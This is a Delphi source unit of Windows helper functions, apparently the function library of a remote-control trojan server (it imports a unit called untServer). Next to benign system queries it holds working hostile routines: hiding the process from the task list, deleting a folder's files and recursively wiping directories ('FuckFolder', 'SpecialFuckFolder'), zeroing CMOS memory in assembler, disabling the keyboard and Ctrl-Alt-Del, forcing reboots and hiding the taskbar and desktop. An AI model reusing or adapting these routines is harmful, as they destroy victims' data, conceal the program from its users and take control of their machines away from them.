(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untFunctions.pas                                ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Global procedures/functions                   ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untFunctions;

interface

uses
  Windows, Messages, SysUtils, Forms, StdCtrls, Graphics, untServer,
  Classes, Winsock;

const
  FileFlags:array [0..7] of Integer = (FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN,
                             FILE_ATTRIBUTE_SYSTEM, FILE_ATTRIBUTE_ARCHIVE,
                             FILE_ATTRIBUTE_NORMAL, FILE_ATTRIBUTE_TEMPORARY,
                             FILE_ATTRIBUTE_COMPRESSED, FILE_ATTRIBUTE_OFFLINE);
                             

function WinDir: string;
function SysDir: string;
function TmpDir: string;
function UserName: string;
function Language:string;
function CompName: string;
function IsSound: string;
function CapsState: string;
function NumState: string;
function ScrollState: string;
function ScreenResolution: string;
function GetDblClickTime: string;
procedure SetDblClickTime(NewTime: Integer);
procedure ChangeComputerName(NewName: string);
procedure OpenCD;
procedure CloseCD;
procedure DisableClip(hWnd: THandle);
procedure EnableClip;
procedure ExitForced;
procedure ExitLogOff;
procedure ExitBoot;
procedure ExitShutDown;
procedure ExitPowerOff;
procedure EnableCAD(State: Boolean);
procedure ShowReBar(cShow : Boolean);
procedure OpenURL(hWnd: THandle; strURL: string);
procedure ReverseButtons(boolReverse: Boolean);
procedure ExecuteScreenSaver(hWnd: THandle);
procedure OpenStartButton(hWnd: THandle);
procedure ShowTask(cShow: Boolean);
procedure ShowStartButton(cShow: Boolean);
procedure ChangeWallPaper(strFile: string);
procedure PowerMonitor(hWnd: THandle; Power: Boolean);
procedure HideInTaskList;
procedure DisableKeyboard;
procedure SetCapsState(NewState: Boolean);
procedure SetNumState(NewState: Boolean);
procedure SetScrollState(NewState: Boolean);
function MsgBox(hWnd: THandle; strPrompt, strCaption: string; carStyle: cardinal):longint;
function TaskList(FirstHandle: THandle; ListAll: Boolean): string;
procedure CopyClipboard(const newText: string);
procedure SetClipboardBuffer(var Buffer; Size: Integer);
function ReadClipboard(var strClip: string): Boolean;
procedure ClearClipboard;
function WindowsVersion: string;
function FreeDiskSpace(strDisk: string):string;
function DriveType(strDisk: string):string;
procedure WindowTop(hWnd:THandle;OnTop:boolean);
function TimeInWindows: string;
procedure ShowWinClock(cShow: Boolean);
procedure ShowTaskIcon(cShow: Boolean);
procedure ShowDesktop(cShow: Boolean);
procedure DeactiveScreenSaver;
procedure SetMenuColor(NewColor: LongInt);
procedure Set3dColor(NewColor: LongInt);
procedure SetWindowColor(NewColor: LongInt);
procedure SetDesktopColor(NewColor: LongInt);
function Red(Color: LongInt):integer;
function Green(Color: LongInt):integer;
function Blue(Color: LongInt):integer;
procedure HideWindow(Handle: THandle; cShow: Boolean);
procedure ShowApplication(AppHandle: THandle; cShow: Boolean);
function ChangeSystemTime(NewTime: TSystemTime):boolean;
procedure _CloseWindow(Handle: THandle);
procedure _ShowWindow(Handle: THandle);
procedure _HideWindow(Handle: THandle);
procedure _EnableWindow(Handle: THandle; Enable:Boolean);
procedure ChangeWindowText(hWnd: THandle; NewText: string);
procedure ActiveWindow(hWnd: THandle);
procedure MinWin(hWnd: THandle);
procedure MaxWin(hWnd: THandle);
procedure MinAll;
procedure _PlayWav(FileName:string);
function GetSize(Data:string):string;
function GetResolution:string;
procedure SetResolution(Index:Integer);
function AdjustFolder(strFolder:string):string;
function GetRootContent(Handle:THandle):string;
function ReadDirectory(strPath:string; Handle:THandle):string;
function GetDrives:string;
procedure FuckFolder(strFolder:string);
procedure Rename(Data:string);
function MyDirectoryExists(lpDir:string):Boolean;
function InternetConnected:Boolean;
procedure SpecialFuckFolder(Dir:string);
procedure PrintInCoordinate(Text:string; clBack, clFore: TColor; FSize,X,Y:Integer);
procedure PrintInCenter(Text:string; clBack, clFore: TColor; FSize, Lines: Integer);
procedure DisableX(hWnd:THandle);
procedure EnumFiles(lpPath, Filter:string; LstObj:TStrings);
procedure ListFiles(lpPath, Filter:string; LstObj:TStrings);
procedure ClearCMOS; assembler;

function RegisterServiceProcess(dwProcessID, dwType: DWord) : DWord; stdcall; external 'KERNEL32.DLL';
function mciSendString(lpstrCommand, lpstrReturnString: PChar; uReturnLength: LongWord; hWndCallback: HWND): DWORD; stdcall; external 'winmm.dll' name 'mciSendStringA';
function waveInGetNumDevs: UINT; stdcall; external 'winmm.dll' name 'waveInGetNumDevs';
function sndPlaySound(lpszSoundName: PChar; uFlags: UINT): BOOL; stdcall; external 'winmm.dll' name 'sndPlaySoundA';
function ShellExecute(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer): HINST; stdcall; external 'shell32.dll' name 'ShellExecuteA';

const
   SND_ASYNC = $0001;

type
    TaPInAddr = array [0..10] of PInAddr;
    PaPInAddr = ^TaPInAddr;
    
implementation

function WinDir: string;
var
   intLen:integer;
   strBuffer:string;
begin
   SetLength(strBuffer,1000);
   intLen:=GetWindowsDirectory(PChar(strBuffer),1000);
   WinDir:=Trim(Copy(strBuffer,1,intLen));
end;

function SysDir: string;
var
   intLen:integer;
   strBuffer:string;
begin
   SetLength(strBuffer,1000);
   intLen:=GetSystemDirectory(PChar(strBuffer),1000);
   SysDir:=Trim(Copy(strBuffer,1,intLen));
end;

function TmpDir: string;
var
   intLen:integer;
   strBuffer:string;
begin
   SetLength(strBuffer,1000);
   intLen:=GetTempPath(1000,PChar(strBuffer));
   TmpDir:=Trim(Copy(strBuffer,1,intLen));
end;

function UserName: string;
const  
  cnMaxUserNameLen = 254;  
var  
  sUserName:string;
  dwUserNameLen:DWord;
begin
  dwUserNameLen:=cnMaxUserNameLen-1;
  SetLength(sUserName,cnMaxUserNameLen );
  GetUserName(PChar(sUserName),dwUserNameLen);
  SetLength(sUserName,dwUserNameLen);
  UserName:=sUserName;
end;

function Language:string;
var
  LanguageID:LangID;
  Lang: array [0..100] of char;
begin  
  LanguageID:=GetSystemDefaultLangID;
  VerLanguageName(LanguageID,Lang,100);
  Language:=String(Lang);
end;

function CompName: string;
var 
  buffer:array[0..MAX_COMPUTERNAME_LENGTH+1] of Char;
  length:Cardinal;
begin
   length:=MAX_COMPUTERNAME_LENGTH+1;
   GetComputerName(@buffer,length);
   CompName:=buffer;
end;

function IsSound: string;
var
   intS:longint;
begin
   intS:=waveInGetNumDevs;
   if intS > 0 then
      IsSound:='Yes'
   else
      IsSound:='No';
end;

function CapsState: string;
begin
   if Odd(GetKeyState(VK_CAPITAL)) then
      CapsState:='On'
   else
      CapsState:='Off';
end;

function NumState: string;
begin
   if Odd(GetKeyState(VK_NUMLOCK)) then
      NumState:='On'
   else
      NumState:='Off';
end;

function ScrollState: string;
begin
   if Odd(GetKeyState(VK_SCROLL)) then
      ScrollState:='On'
   else
      ScrollState:='Off';
end;

function ScreenResolution: string;
var
   X,Y:longint;
begin
   X:=GetSystemMetrics(SM_CXSCREEN);
   Y:=GetSystemMetrics(SM_CYSCREEN);
   ScreenResolution:=Format('%dx%d',[X,Y]);
end;

function GetDblClickTime: string;
begin
   GetDblClickTime:=IntToStr(GetDoubleClickTime);
end;

procedure SetDblClickTime(NewTime: Integer);
begin
   SetDoubleClickTime(NewTime);
end;

procedure ChangeComputerName(NewName: string);
begin
   SetComputerName(PChar(NewName));
end;

procedure OpenCD;
begin
   mciSendString(Pchar('set cdaudio door open'),nil,0,0);
end;

procedure CloseCD;
begin
   mciSendString(Pchar('set cdaudio door closed'),nil,0,0);
end;

procedure DisableClip(hWnd: THandle);
begin
   OpenClipboard(hWnd);
end;

procedure EnableClip;
begin
   CloseClipboard;
end;

procedure ExitForced;
begin
   ExitWindowsEx(EWX_FORCE or EWX_REBOOT, 0);
end;

procedure ExitLogOff;
begin
   ExitWindowsEx(EWX_LOGOFF, 0);
end;

procedure ExitBoot;
begin
   ExitWindowsEx(EWX_REBOOT, 0);
end;

procedure ExitShutDown;
begin
   ExitWindowsEx(EWX_SHUTDOWN, 0);
end;

procedure ExitPowerOff;
begin
   SetSystemPowerState(true,true);
end;

procedure EnableCAD(State: Boolean);
begin
   if State then
      SystemParametersInfo(SPI_SCREENSAVERRUNNING,0,nil,0)
   else
      SystemParametersInfo(SPI_SCREENSAVERRUNNING,1,nil,0);
end;

procedure ShowReBar(cShow : Boolean);
var
   TaskHandle,ReBarHandle:THandle;
begin
   TaskHandle:=FindWindow(PChar('Shell_traywnd'),nil);
   ReBarHandle:=FindWindowEx(TaskHandle,0,'ReBarWindow32',nil);
   if cShow then
      ShowWindow(ReBarHandle,SW_SHOW)
   else
      ShowWindow(ReBarHandle,SW_HIDE);
end;

procedure OpenURL(hWnd: THandle; strURL: string);
begin
   ShellExecute(hWnd,'Open',PChar(strURL),nil,nil,1);
end;

procedure ReverseButtons(boolReverse: Boolean);
begin
   SwapMouseButton(boolReverse);
end;

procedure ExecuteScreenSaver(hWnd: THandle);
begin
   SendMessage(hWnd,WM_SYSCOMMAND,SC_SCREENSAVE,0);
end;

procedure OpenStartButton(hWnd: THandle);
begin
   SendMessage(hWnd,WM_SYSCOMMAND,SC_TASKLIST,0);
end;

procedure ShowTask(cShow: Boolean);
begin
   if cShow then
      SetWindowPos(FindWindow(PChar('Shell_traywnd'),nil),0,0,0,0,0,SWP_SHOWWINDOW)
   else
      SetWindowPos(FindWindow(PChar('Shell_traywnd'),nil),0,0,0,0,0,SWP_HIDEWINDOW);
end;

procedure ShowStartButton(cShow: Boolean);
var
   ButtonHandle,TaskHandle:THandle;
begin
   TaskHandle:=FindWindow(PChar('Shell_traywnd'),nil);
   ButtonHandle:=FindWindowEx(TaskHandle,0,'Button',nil);
   if cShow then
      ShowWindow(ButtonHandle,SW_SHOW)
   else
      ShowWindow(ButtonHandle,SW_HIDE);
end;

procedure ChangeWallPaper(strFile: string);
var
   cFile:PChar;
begin
   strFile:=strFile + #0;
   cFile:=@strFile[1];
   SystemParametersInfo(SPI_SETDESKWALLPAPER,0,cFile,SPIF_UPDATEINIFILE);
end;

procedure PowerMonitor(hWnd: THandle; Power: Boolean);
begin
   if Power then
      SendMessage(hWnd,WM_SYSCOMMAND,SC_MONITORPOWER,0)
   else
      SendMessage(hWnd,WM_SYSCOMMAND,SC_MONITORPOWER,-1);
end;

procedure HideInTaskList;
begin
   RegisterServiceProcess(GetCurrentProcessId,1);
end;

procedure DisableKeyboard;
var
   TmpWin:string;
   L:Integer;
begin
   TmpWin:=WinDir;
   L:=Length(TmpWin);
   if Copy(TmpWin,L,L) <> '\' then TmpWin:=TmpWin + '\';
   WinExec(PChar(TmpWin + 'rundll32.exe keyboard,disable'),SW_SHOWNORMAL);
end;

procedure SetCapsState(NewState: Boolean);
var
   Key:TKeyboardState;
begin
   GetKeyboardState(Key);
   if NewState then
      Key[VK_CAPITAL]:=1
   else
      Key[VK_CAPITAL]:=0;
   SetKeyboardState(Key);
end;

procedure SetNumState(NewState: Boolean);
var
   Key:TKeyboardState;
begin
   GetKeyboardState(Key);
   if NewState then
      Key[VK_NUMLOCK]:=1
   else
      Key[VK_NUMLOCK]:=0;
   SetKeyboardState(Key);
end;

procedure SetScrollState(NewState: Boolean);
var
   Key:TKeyboardState;
begin
   GetKeyboardState(Key);
   if NewState then
      Key[VK_SCROLL]:=1
   else
      Key[VK_SCROLL]:=0;
   SetKeyboardState(Key);
end;

function MsgBox(hWnd: THandle; strPrompt, strCaption: string; carStyle: cardinal):longint;
begin
   MsgBox:=MessageBox(hWnd,PChar(strPrompt),PChar(strCaption),carStyle);
end;

function TaskList(FirstHandle: THandle; ListAll: Boolean): string;
var
   lngLen:longint;
   strBuffer,This,All:string;
   TaskHandle:THandle;
   cChar:Char;
begin
   cChar:=Chr(13);
   TaskHandle:=GetWindow(FirstHandle,GW_HWNDFIRST);
   while TaskHandle > 0 do
   begin
      if (TaskHandle <> FirstHandle) and (TaskHandle <> Application.Handle) then
      begin
         lngLen:=GetWindowTextLength(TaskHandle) + 1;
         SetLength(strBuffer,lngLen);
         lngLen:=GetWindowText(TaskHandle,PChar(strBuffer),lngLen);
         if lngLen > 0 then
         begin
            This:=TrimRight(strBuffer);
            if ListAll then
               All:=All + This + cChar + IntToStr(TaskHandle) + cChar
            else
               if IsWindowVisible(TaskHandle) then
                  All:=All + This + cChar + IntToStr(TaskHandle) + cChar;
         end;
      end;
      TaskHandle:=GetWindow(TaskHandle,GW_HWNDNEXT);
   end;
   TaskList:=Copy(All,1,Length(All) - 1);
end;

procedure CopyClipboard(const newText: string);
begin
   SetClipboardBuffer(PChar(newText)^,Length(newText) + 1);
end;

procedure SetClipboardBuffer(var Buffer; Size: Integer);
var
  Data: THandle;
  DataPtr: Pointer;
begin
  EnableClip;
  OpenClipboard(Application.MainForm.Handle);
  try
    Data := GlobalAlloc(GMEM_MOVEABLE+GMEM_DDESHARE, Size);
    try
      DataPtr := GlobalLock(Data);
      try
        Move(Buffer, DataPtr^, Size);
        EmptyClipboard;
        SetClipboardData(CF_TEXT, Data);
      finally
        GlobalUnlock(Data);
      end;
    except
      GlobalFree(Data);
    end;
  finally
    CloseClipboard;
  end;
end;

function ReadClipboard(var strClip: string): Boolean;
var
   Data:THandle;
begin
   ReadClipboard:=False;
   EnableClip;
   OpenClipboard(Application.MainForm.Handle);
   Data := GetClipboardData(CF_TEXT);
   try
     if Data <> 0 then
     begin
       strClip:=PChar(GlobalLock(Data));
       ReadClipboard:=True;
     end;
   finally
     if Data <> 0 then GlobalUnlock(Data);
     CloseClipboard;
   end;
end;

procedure ClearClipboard;
begin
   EnableClip;
   OpenClipboard(Application.MainForm.Handle);
   EmptyClipboard;
   CloseClipboard;
end;

function WindowsVersion: string;
var
   Info: _OSVERSIONINFOA;
   cSystem: string;
begin
   Info.dwOSVersionInfoSize:=SizeOf(Info);
   GetVersionEx(Info);
   if Info.dwPlatformId = VER_PLATFORM_WIN32_NT then
      cSystem:='Windows NT '
   else if Info.dwPlatformId = VER_PLATFORM_WIN32_WINDOWS then
      cSystem:='Windows 95/98 '
   else if Info.dwPlatformId = VER_PLATFORM_WIN32s then
      cSystem:='Win32s '
   else
      cSystem:='Unknown';
   cSystem:=cSystem + IntToStr(Info.dwMajorVersion) + '.' + IntToStr(Info.dwMinorVersion);
   cSystem:=cSystem + ' ' + Trim(IntToStr(Info.dwBuildNumber)) + ' ' + Trim(Info.szCSDVersion);;
   WindowsVersion:=cSystem;
end;

function FreeDiskSpace(strDisk: string):string;
var
   Bytes,Sectors:Cardinal;
   freeClusters,totalClusters:Cardinal;
begin
   GetDiskFreeSpace(PChar(strDisk),Sectors,Bytes,freeClusters,totalClusters);
   FreeDiskSpace:=FormatFloat('###,###',(Sectors * Bytes * freeClusters));
end;

function DriveType(strDisk: string):string;
begin
   case GetDriveType(PChar(strDisk)) of
      DRIVE_REMOVABLE: DriveType:='Removable';
      DRIVE_FIXED: DriveType:='Fixed';
      DRIVE_REMOTE: DriveType:='Remote';
      DRIVE_CDROM: DriveType:='CD-ROM';
      DRIVE_RAMDISK: DriveType:='RamDisk';
      else DriveType:='Unknown';
   end;
end;

procedure WindowTop(hWnd:THandle;OnTop:boolean);
begin
   if OnTop then
      SetWindowPos(hWnd,HWND_TOPMOST,0,0,0,0,SWP_NOMOVE or SWP_NOSIZE)
   else
      SetWindowPos(hWnd,HWND_NOTOPMOST,0,0,0,0,SWP_NOMOVE or SWP_NOSIZE);
end;

function TimeInWindows: string;
begin
   TimeInWindows:=FormatFloat('0#',GetTickCount div 1000 div 60);
end;

procedure ShowWinClock(cShow: Boolean);
var
   TaskHandle,NotifyHandle,ClockHandle:THandle;
begin
   TaskHandle:=FindWindow(PChar('Shell_traywnd'),nil);
   NotifyHandle:=FindWindowEx(TaskHandle,0,'TrayNotifyWnd',nil);
   ClockHandle:=FindWindowEx(NotifyHandle,0,'TrayClockWClass',nil);
   if cShow then
      ShowWindow(ClockHandle,SW_SHOW)
   else
      ShowWindow(ClockHandle,SW_HIDE);
end;

procedure ShowTaskIcon(cShow: Boolean);
var
   TaskHandle,NotifyHandle:THandle;
begin
   TaskHandle:=FindWindow(PChar('Shell_traywnd'),nil);
   NotifyHandle:=FindWindowEx(TaskHandle,0,'TrayNotifyWnd',nil);
   if cShow then
      ShowWindow(NotifyHandle,SW_SHOW)
   else
      ShowWindow(NotifyHandle,SW_HIDE);
end;

procedure ShowDesktop(cShow: Boolean);
var
   DeskHandle:THandle;
begin
   DeskHandle:=FindWindowEx(0,0,'Progman',nil);
   if cShow then
      ShowWindow(DeskHandle,SW_SHOW)
   else
      ShowWindow(DeskHandle,SW_HIDE);
end;

procedure DeactiveScreenSaver;
begin
   SystemParametersInfo(SPI_SETSCREENSAVEACTIVE,0,nil,0);
end;

procedure SetMenuColor(NewColor: LongInt);
var
   R,G,B:Integer;
   Colors,Items:array [0..1] of LongInt;
begin
   R:=Red(NewColor);
   G:=Green(NewColor);
   B:=Blue(NewColor);
   Items[0]:=COLOR_MENU;
   Items[1]:=COLOR_MENUTEXT;
   Colors[0]:=NewColor;
   Colors[1]:=RGB(255 - R,255 - G,255 - B);
   SetSysColors(High(Items),Items,Colors);
end;

procedure Set3dColor(NewColor: LongInt);
var
   Colors,Items:array [0..1] of LongInt;
begin
   Items[0]:=COLOR_BTNFACE;
   Items[1]:=COLOR_3DFACE;
   Colors[0]:=NewColor;
   Colors[1]:=NewColor;
   SetSysColors(High(Items),Items,Colors);
end;

procedure SetWindowColor(NewColor: LongInt);
var
   Colors,Items:array [0..1] of LongInt;
begin
   Items[0]:=COLOR_WINDOW;
   Items[1]:=COLOR_WINDOW;
   Colors[0]:=NewColor;
   Colors[1]:=NewColor;
   SetSysColors(High(Items),Items,Colors);
end;

procedure SetDesktopColor(NewColor: LongInt);
var
   Colors,Items:array [0..1] of LongInt;
begin
   Items[0]:=COLOR_BACKGROUND;
   Items[1]:=COLOR_BACKGROUND;
   Colors[0]:=NewColor;
   Colors[1]:=NewColor;
   SetSysColors(High(Items),Items,Colors);
end;

function Red(Color: LongInt):integer;
begin
   Red:=Color mod 256;
end;

function Green(Color: LongInt):integer;
begin
   Green:=((Color and $FF00) div 256) mod 256;
end;

function Blue(Color: LongInt):integer;
begin
   Blue:=(Color and $FF0000) div 65536;
end;

procedure ShowApplication(AppHandle: THandle; cShow: Boolean);
var
   Window:LongInt;
begin
   if cShow then
   begin
      Window:=GetWindowLong(AppHandle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW and WS_EX_APPWINDOW;
      SetWindowLong(AppHandle, GWL_EXSTYLE,Window);
   end
   else
   begin
      Window:=GetWindowLong(AppHandle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW and not WS_EX_APPWINDOW;
      SetWindowLong(AppHandle, GWL_EXSTYLE,Window);
   end;
end;

procedure HideWindow(Handle: THandle; cShow: Boolean);
begin
   if cShow then
      ShowWindow(handle,SW_SHOW)
   else
      ShowWindow(handle,SW_HIDE);
end;

function ChangeSystemTime(NewTime: TSystemTime):boolean;
begin
   ChangeSystemTime:=SetLocalTime(NewTime);
end;

procedure _CloseWindow(Handle: THandle);
begin
   SendMessage(Handle,WM_CLOSE,0,0);
end;

procedure _ShowWindow(Handle: THandle);
begin
   if IsWindowVisible(Handle) then Exit;
   ShowWindow(Handle,SW_SHOW);
end;

procedure _HideWindow(Handle: THandle);
begin
   if not IsWindowVisible(Handle) then Exit;
   ShowWindow(Handle,SW_HIDE);
end;

procedure _EnableWindow(Handle: THandle; Enable:Boolean);
begin
   EnableWindow(Handle,Enable);
end;

procedure ChangeWindowText(hWnd: THandle; NewText: string);
begin
   SetWindowText(hWnd,PChar(NewText));
end;

procedure ActiveWindow(hWnd: THandle);
begin
   SetForegroundWindow(hWnd);
end;

procedure MinWin(hWnd: THandle);
begin
   ShowWindow(hWnd,SW_MINIMIZE);
end;

procedure MaxWin(hWnd: THandle);
begin
   ShowWindow(hWnd,SW_MAXIMIZE);
end;

procedure MinAll;
begin
   keybd_event(VK_LWIN,0,0,0);
   keybd_event(77,0,0,0);
   keybd_event(VK_LWIN,0,KEYEVENTF_KEYUP,0);
end;

procedure _PlayWav(FileName:string);
begin
   sndPlaySound(PChar(FileName),SND_ASYNC);
end;

function GetSize(Data:string):string;
var
   fPnt:LongInt;
begin
   fPnt:=CreateFile(PChar(Data),GENERIC_READ or GENERIC_WRITE,
                  0,nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
   GetSize:=ExtractFileName(Data) + ' - ' + IntToStr(GetFileSize(fPnt,nil)) + ' bytes';
   CloseHandle(fPnt);
end;

function GetResolution:string;
var
   c:integer;
   DevMode:TDeviceMode;
   All,l:string;
begin
   c:=0;
   l:=Chr(13);
   while EnumDisplaySettings(nil,c,DevMode) do
   begin
      with DevMode do
         All:=All + Format('%dx%d, %d colors',[dmPelsWidth,dmPelsHeight,1 shl dmBitsPerPel]) + l;
      Inc(c);
   end;
   GetResolution:=Copy(All,1,Length(All) - 1);
end;

procedure SetResolution(Index:Integer);
var
   DevMode:TDeviceMode;
begin
   if Index < 0 then Exit;
   if EnumDisplaySettings(nil,Index,DevMode) then
      ChangeDisplaySettings(DevMode,0);
end;

function AdjustFolder(strFolder:string):string;
var
   l:longint;
begin
   strFolder:=Trim(strFolder);
   l:=Length(strFolder);
   if Copy(strFolder,l,l) = '\' then
      AdjustFolder:=strFolder
   else
      AdjustFolder:=strFolder + '\';
end;

function GetRootContent(Handle:THandle):string;
var
   tmpR:string;
begin
   tmpR:=WinDir;
   if (Trim(tmpR) = '') or not MyDirectoryExists(tmpR) then
      tmpR:=Copy(Application.ExeName,1,3)
   else
      tmpR:=Copy(tmpR,1,3);
   GetRootContent:=ReadDirectory(tmpR,Handle);
end;

function ReadDirectory(strPath:string; Handle:THandle):string;
var
   c,r:string;
   fHandle,j:Longint;
   WFD:_WIN32_FIND_DATAA;
   NewList:TListBox;
begin
   NewList:=TListBox.CreateParented(Handle);
   NewList.Visible:=False;
   NewList.Sorted:=True;
   c:=Chr(13);
   strPath:=AdjustFolder(strPath);
   fHandle:=FindFirstFile(PChar(strPath + '*.*'),WFD);
   if fHandle <> -1 then
   begin
      r:=strPath + c;
      repeat
      begin
         if Ord(WFD.cFileName[0]) <> 46 then
         begin
            if (WFD.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY then
               NewList.Items.Add('\' + string(WFD.cFileName))
            else
               for j:=0 to 7 do
                  if Bool(WFD.dwFileAttributes and FileFlags[j]) then
                  begin
                     NewList.Items.Add(string(WFD.cFileName));
                     Break;
                  end;
         end;
      end;
      until FindNextFile(fHandle,WFD) = false;
      Windows.FindClose(fHandle);
      for j:=0 to NewList.Items.Count -1 do
         r:=r + NewList.Items[j] + c;
   end
   else
      r:=strPath;
   NewList.Free;
   ReadDirectory:=Copy(r,1,Length(r) - 1);
end;

function GetDrives:string;
var
   p:integer;
   This,All,c,f,cDrives:string;
begin
   c:=Chr(13);
   f:=Chr(0);
   SetLength(cDrives,300);
   GetLogicalDriveStrings(300,PChar(cDrives));
   p:=Pos(f,cDrives);
   while p > 0 do
   begin
      This:=Copy(cDrives,1,p - 1);
      if Length(This) <> 3 then Break;
      This:=UpperCase(This) + ' - ' + DriveType(This);
      cDrives:=Copy(cDrives,p + 1,Length(cDrives));
      p:=Pos(f,cDrives);
      All:=All + This + c;
   end;
   GetDrives:=Copy(All,1,Length(All) - 1);
end;

procedure FuckFolder(strFolder:string);
var
   fHandle,j:longint;
   WFD:_WIN32_FIND_DATAA;
begin
   strFolder:=AdjustFolder(strFolder);
   fHandle:=FindFirstFile(PChar(strFolder + '*.*'),WFD);
   if fHandle <> 0 then
   begin
      repeat
      begin
         for j:=0 to 7 do
            if Bool(WFD.dwFileAttributes and FileFlags[j]) then
            begin
               DeleteFile(strFolder + string(WFD.cFileName));
               Break;
            end;
      end;
      until FindNextFile(fHandle,WFD) = false;
      Windows.FindClose(fHandle);
   end;
end;

procedure Rename(Data:string);
var
   p:longint;
   Old,New:string;
begin
   p:=Pos(Chr(13),Data);
   Old:=Copy(Data,1,p - 1);
   New:=Copy(Data,p + 1,Length(Data));
   RenameFile(Old,New);
end;

function MyDirectoryExists(lpDir:string):Boolean;
var
   Code:Integer;
begin
   Code := GetFileAttributes(PChar(lpDir));
   Result := (Code <> -1) and (FILE_ATTRIBUTE_DIRECTORY and Code <> 0);
end;

function InternetConnected:Boolean;
   function LocalIP:string;
   var
       phe : PHostEnt;
       pptr : PaPInAddr;
       Buffer : array [0..63] of char;
       I : Integer;
       GInitData : TWSADATA;
   begin
       WSAStartup($101, GInitData);
       Result := '';
       GetHostName(Buffer, SizeOf(Buffer));
       phe :=GetHostByName(buffer);
       if phe = nil then
       begin
          Exit;
       end;
       pptr := PaPInAddr(Phe^.h_addr_list);
       I := 0;
       while pptr^[I] <> nil do
       begin
          Application.ProcessMessages;
          result:=StrPas(inet_ntoa(pptr^[I]^));
          Inc(I);
       end;
       WSACleanup;
   end;
var
   S:string;
begin
   S:=Copy(LocalIP,1,3);
   Result:=(S < '255') and (S > '127');
end;

procedure SpecialFuckFolder(Dir:string);
var
   FData:WIN32_FIND_DATA;
   fHandle:LongInt;
begin
   Dir:=AdjustFolder(Dir);
   fHandle:=FindFirstFile(PChar(Dir + '*.*'),FData);
   if fHandle < 0 then Exit;
   repeat
   begin
      if Ord(FData.cFileName[0]) <> 46 then
      begin
         if FData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY = FILE_ATTRIBUTE_DIRECTORY then
         begin
            SpecialFuckFolder(Dir + FData.cFileName);
            RemoveDirectory(PChar(Dir + FData.cFileName));
         end
         else
            Windows.DeleteFile(PChar(Dir + FData.cFileName));
      end;
   end;
   until FindNextFile(fHandle,FData) = False;
   Windows.FindClose(fHandle);
end;

procedure PrintInCoordinate(Text:string; clBack, clFore: TColor; FSize,X,Y:Integer);
var
   CrLf,cLine:string;
   c,LineH,p:LongInt;
   Dc:HDC;
begin
   CrLf:=#13#10;
   c:=0;
   Dc:=GetWindowDc(GetDesktopWindow);
   with TCanvas.Create do
   begin
      Handle:=Dc;
      Font.Size:=FSize;
      Font.Color:=clFore;
      Brush.Color:=clBack;
      LineH:=TextHeight('H');
      p:=Pos(CrLf,Text);
      while p > 0 do
      begin
         cLine:=Copy(Text,1,p - 1);
         Text:=Copy(Text,p + Length(CrLf),Length(Text));
         TextOut(X,Y + (c * LineH),cLine);
         c:=c + 1;
         p:=Pos(CrLf,Text);
      end;
      TextOut(X,Y + (c * LineH),Text);
      Free;
   end;
end;

procedure PrintInCenter(Text:string; clBack, clFore: TColor; FSize, Lines: Integer);
var
   CrLf,cLine:string;
   c,W,H,LineH,p:LongInt;
   Dc:HDC;
begin
   CrLf:=#13#10;
   c:=0;
   W:=Screen.Width;
   H:=Screen.Height;
   Dc:=GetWindowDc(GetDesktopWindow);
   with TCanvas.Create do
   begin
      Handle:=Dc;
      Font.Size:=FSize;
      Font.Color:=clFore;
      Brush.Color:=clBack;
      LineH:=TextHeight('H');
      p:=Pos(CrLf,Text);
      H:=(H - (LineH * (Lines))) div 2;
      while p > 0 do
      begin
         cLine:=Copy(Text,1,p - 1);
         Text:=Copy(Text,p + Length(CrLf),Length(Text));
         TextOut((W - TextWidth(cLine)) div 2,H + (c * LineH),cLine);
         c:=c + 1;
         p:=Pos(CrLf,Text);
      end;
      TextOut((W - TextWidth(Text)) div 2,H + (c * LineH),Text);
      Free;
   end;
end;

procedure DisableX(hWnd:THandle);
var
   mnuX:HMENU;
begin
   mnuX:=GetSystemMenu(hWnd,False);
   EnableMenuItem(mnuX,SC_CLOSE,MF_BYCOMMAND or MF_GRAYED);
end;

procedure ListFiles(lpPath, Filter:string; LstObj:TStrings);
var
   hFFile:THandle;
   WFD:WIN32_FIND_DATA;
begin
   hFFile:=FindFirstFile(PChar(lpPath + '\' + Filter),WFD);
   if (hFFile = 0) then
      Exit;
   repeat
      Application.ProcessMessages;
      if Ord(WFD.cFileName[1]) <> 46 then
         if FileExists(lpPath + '\' + WFD.cFileName) then
            LstObj.Add(lpPath + '\' + WFD.cFileName);
   until FindNextFile(hFFile,WFD) = False;
   Windows.FindClose(hFFile);
end;

procedure EnumFiles(lpPath, Filter:string; LstObj:TStrings);
var
   hFile:THandle;
   WFD:WIN32_FIND_DATA;
begin
   hFile:=FindFirstFile(PChar(lpPath + '\*.*'),WFD);
   if (hFile = 0) then Exit;
   repeat
      Application.ProcessMessages;
      if Ord(WFD.cFileName[0]) <> 46 then
      begin
         if Boolean(WFD.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) then
         begin
            EnumFiles(lpPath + '\' + WFD.cFileName,Filter,LstObj);
            ListFiles(lpPath + '\' + WFD.cFileName,Filter,LstObj);
         end;
      end;
   until FindNextFile(hFile,WFD) = False;
   Windows.FindClose(hFile);
end;

procedure ClearCMOS;
asm
       MOV AX,0h        { 0 hex start of CMOS memory address }

@L1:   OUT 70h,AX       { Goto address of CMOS memory specified by the contents of Accumulator }
       MOV BX,AX        { Save contents of Accumulator (OUT instruction can only use Accumulator) }
       MOV AX,0h        { Put 0 hex data into CMOS memory }
       OUT 71h,AX       { Put 0 hex data into CMOS memory }
       MOV AX,BX        { Restore contents of Accumulator }
       INC AX           { Add 1 to contents of the Accumulator }
       CMP AX,03Fh      { Remmember 3F hex equals 63 Dec Have we put 0 hex in CMOS memory addreses from 0 Dec to 63 DEC ? }
       JNZ @L1          { Has the L1 loop run 64 times? }
end;

end.
